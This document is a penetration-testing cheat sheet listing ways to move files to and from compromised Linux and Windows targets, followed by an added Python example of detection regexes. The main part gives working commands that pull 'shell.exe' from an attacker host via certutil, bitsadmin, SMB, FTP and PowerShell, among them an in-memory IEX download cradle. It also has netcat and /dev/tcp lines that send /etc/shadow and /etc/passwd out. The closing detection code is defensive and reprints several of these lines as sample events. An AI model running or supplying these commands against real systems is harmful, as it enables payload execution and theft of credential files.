File Transfers
Every method for moving files to and from targets.
LINUX TARGET
Python HTTP server + wget/curl
Most common method — Works on almost every Linux target
# On attacker:
python3 -m http.server 80
# On target:
wget http://$LHOST/file -O /tmp/file
curl http://$LHOST/file -o /tmp/file
Netcat file transfer
No HTTP needed — Direct TCP transfer
# On attacker (send):
nc -lvnp 4444 < file.txt
# On target (receive):
nc $LHOST 4444 > file.txt
SCP (via SSH)
Encrypted transfer — If you have SSH credentials
scp file.txt user@$IP:/tmp/file.txt
scp user@$IP:/etc/passwd ./passwd
Base64 encode/decode
No network transfer needed — Copy/paste through shell
# On attacker:
base64 -w 0 file.bin
# On target:
echo "BASE64STRING" | base64 -d > file.bin
/dev/tcp (bash only)
No tools needed — Bash built-in
# Attacker: nc -lvnp 4444 > file.txt
# Target:
cat /etc/passwd > /dev/tcp/$LHOST/4444
WINDOWS TARGET
certutil
Built into Windows — Download files via HTTP
certutil -urlcache -f http://$LHOST/shell.exe C:\Windows\Temp\shell.exe
PowerShell download cradles
Multiple methods — Try each if one is blocked
# DownloadFile (saves to disk):
(New-Object Net.WebClient).DownloadFile('http://$LHOST/shell.exe','C:\Windows\Temp\shell.exe')
# DownloadString (in-memory execution):
IEX(New-Object Net.WebClient).DownloadString('http://$LHOST/shell.ps1')
# Invoke-WebRequest (PowerShell 3+):
Invoke-WebRequest -Uri http://$LHOST/shell.exe -OutFile C:\Windows\Temp\shell.exe
SMB share
Serve files via SMB — Often works when HTTP is blocked
# On attacker:
impacket-smbserver share $(pwd) -smb2support
# On target:
copy \\$LHOST\share\shell.exe C:\Windows\Temp\shell.exe
Bitsadmin
Built-in Windows tool — Alternative to certutil
bitsadmin /transfer job /download /priority high http://$LHOST/shell.exe C:\Windows\Temp\shell.exe
Windows FTP (non-interactive)
Script FTP commands — Bypass interactive prompt
echo open $LHOST> ftp.txt
echo USER anonymous>> ftp.txt
echo binary>> ftp.txt
echo GET shell.exe>> ftp.txt
echo bye>> ftp.txt
ftp -s:ftp.txt
EXFILTRATION
Netcat exfil
Send files back to attacker — Simple TCP
# Attacker: nc -lvnp 4444 > loot.txt
# Target: nc $LHOST 4444 < /etc/shadow
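DETECTION (added example)
Defender view of the commands above. This is an added example, not part of the original cheat sheet: it matches process command lines against one regex per technique listed on this page. Rule names, patterns, hosts and sample events are assumptions constructed for illustration.

```python
import re

# Illustrative regexes over process command lines, one per technique on this
# page. Rule names and patterns are assumptions made for this example.
RULES = {
    "certutil-urlcache": re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*https?://", re.I),
    "bitsadmin-transfer": re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b.*https?://", re.I),
    "powershell-cradle": re.compile(
        r"Net\.WebClient\)?\.Download(File|String)\(|\bInvoke-WebRequest\b.*-OutFile", re.I),
    "ftp-script": re.compile(r"\bftp(\.exe)?\b.*\s-s:", re.I),
    "smb-copy": re.compile(r"\bcopy\s+\\\\[^\\\s]+\\", re.I),
    "dev-tcp": re.compile(r"/dev/tcp/[^/\s]+/\d+"),
    "nc-redirect": re.compile(r"\b(nc|ncat|netcat)\b[^|;&]*\s\d{2,5}\s*[<>]"),
    "base64-decode": re.compile(r"\bbase64\s+(-d|--decode)\b.*>"),
    "http-fetch-to-tmp": re.compile(r"\b(wget|curl)\b.*https?://.*\s-[oO]\s+/tmp/"),
}

# Constructed process-creation events (host, command line). 192.0.2.10 is a
# documentation address and the file names are made up.
SAMPLE_EVENTS = [
    ("ws01", r"certutil -urlcache -f http://192.0.2.10/tool.exe C:\Windows\Temp\tool.exe"),
    ("ws01", r"certutil -verify C:\certs\server.cer"),      # benign certutil use
    ("ws02", "powershell -c IEX(New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"),
    ("ws02", r"copy \\192.0.2.10\share\tool.exe C:\Windows\Temp\tool.exe"),
    ("web01", "bash -c 'cat /etc/passwd > /dev/tcp/192.0.2.10/4444'"),
    ("web01", "nc 192.0.2.10 4444 < /etc/shadow"),
    ("web01", "curl -s https://example.org/api/health"),    # benign curl use
]

def classify(cmdline):
    """Return the sorted names of every rule the command line matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def scan(events):
    """Return (host, cmdline, hits) for each event with at least one rule hit."""
    results = ((host, cmd, classify(cmd)) for host, cmd in events)
    return [r for r in results if r[2]]

if __name__ == "__main__":
    for host, cmdline, hits in scan(SAMPLE_EVENTS):
        print(f"{host}: {','.join(hits)}: {cmdline}")
```

The wget/curl rule also fires on legitimate downloads to /tmp, so treat hits as triage leads rather than verdicts. SCP has no rule here because its command line is indistinguishable from routine administration.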